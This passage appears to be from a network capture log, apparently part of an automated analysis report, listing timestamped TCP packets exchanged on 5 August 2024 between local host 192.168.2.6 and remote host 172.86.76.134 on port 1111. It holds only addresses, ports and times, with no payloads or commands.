                              Aug 5, 2024 14:40:49.163944006 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.163964987 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.164630890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164644003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164653063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164664984 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164674044 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.164675951 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164688110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164700031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164707899 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.164710999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164721966 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164727926 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.164732933 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164745092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164750099 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.164757013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.164772034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.164793015 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.247689009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247706890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247721910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247744083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247754097 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247766018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247778893 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.247809887 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.247863054 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.247989893 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248001099 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248012066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248024940 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248029947 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248073101 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248198032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248210907 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248222113 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248234034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248234034 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248248100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248260021 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248261929 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248294115 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248445988 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248492956 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248533010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248544931 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248563051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248574018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248585939 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248614073 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248627901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248639107 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248648882 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248661041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248668909 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248672009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248682976 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.248703003 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.248729944 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.249277115 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249289989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249301910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249313116 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249332905 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249344110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249356985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249460936 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.249480009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249491930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249502897 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249515057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249522924 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.249547958 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.249548912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249561071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249571085 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249583006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249594927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.249600887 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.249629974 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250026941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250039101 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250051022 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250063896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250071049 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250077009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250102043 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250672102 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250684977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250696898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250710011 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250727892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250731945 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250741005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250752926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250760078 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250765085 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250777006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250787020 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250792980 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250799894 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250811100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250817060 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250822067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250834942 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250839949 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250848055 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.250863075 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.250900030 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251312971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251324892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251338959 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251351118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251359940 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251363993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251375914 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251388073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251399040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251410007 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251416922 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251421928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251427889 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251434088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251446009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251452923 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251456976 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251468897 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251477957 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251481056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251492977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.251499891 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.251533031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252315998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252329111 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252338886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252351046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252362967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252365112 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252373934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252387047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252398968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252405882 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252412081 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252422094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252433062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252435923 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252444983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252455950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252466917 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252469063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252489090 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252489090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252501965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252506971 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252518892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252528906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.252573967 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.252593994 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.253078938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253093004 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253103018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253113985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253134012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253134966 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.253144979 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.253145933 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253161907 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253175020 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253187895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253201962 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253202915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.253213882 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253225088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.253242016 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.253257036 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.299992085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340111017 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340128899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340143919 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340162039 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340184927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340197086 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340210915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340271950 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340303898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340316057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340327978 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340339899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340353012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340390921 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340420961 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340543985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340589046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340593100 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340783119 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340795040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340806961 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340818882 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340831041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340840101 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340843916 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340857983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.340861082 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340883017 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.340908051 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341077089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341089010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341099977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341111898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341134071 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341156960 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341175079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341187000 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341197014 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341207981 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341221094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341233015 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341244936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341254950 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341257095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341286898 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341286898 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341314077 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341830015 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341841936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341852903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341864109 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341876030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341886997 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341888905 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.341907978 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.341933012 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342099905 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342113018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342123985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342135906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342148066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342154026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342178106 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342195034 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342206955 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342217922 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342228889 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342240095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342242002 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342252970 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342262030 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342266083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342278957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342287064 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342291117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.342310905 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342329025 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.342787027 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343018055 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343030930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343041897 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343053102 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343064070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343071938 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343075037 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343086004 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343097925 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343096972 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343112946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343116045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343125105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343136072 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343138933 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343147993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343158960 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343161106 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343170881 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343182087 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343194962 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343199968 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343224049 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343868971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343882084 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343892097 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343911886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343921900 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343923092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343935966 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343945980 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343949080 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343957901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343969107 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343976974 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.343980074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.343990088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344002008 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344013929 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344019890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344032049 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344036102 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344044924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344058037 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344069004 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344094992 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344779968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344793081 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344810963 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344820976 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344831944 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344835043 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344841957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344854116 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344865084 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344877005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344887972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344888926 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344888926 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344898939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344911098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344916105 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344922066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344933987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344938993 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.344945908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344957113 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.344964027 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.345005989 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.345624924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345638037 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345649004 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345659971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345678091 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345679998 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.345690012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345700026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.345701933 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345714092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345716000 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.345726013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345737934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.345761061 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.345788956 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.386684895 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.428694963 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428726912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428738117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428813934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428819895 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.428827047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428865910 CEST497211111192.168.2.6172.86.76.134
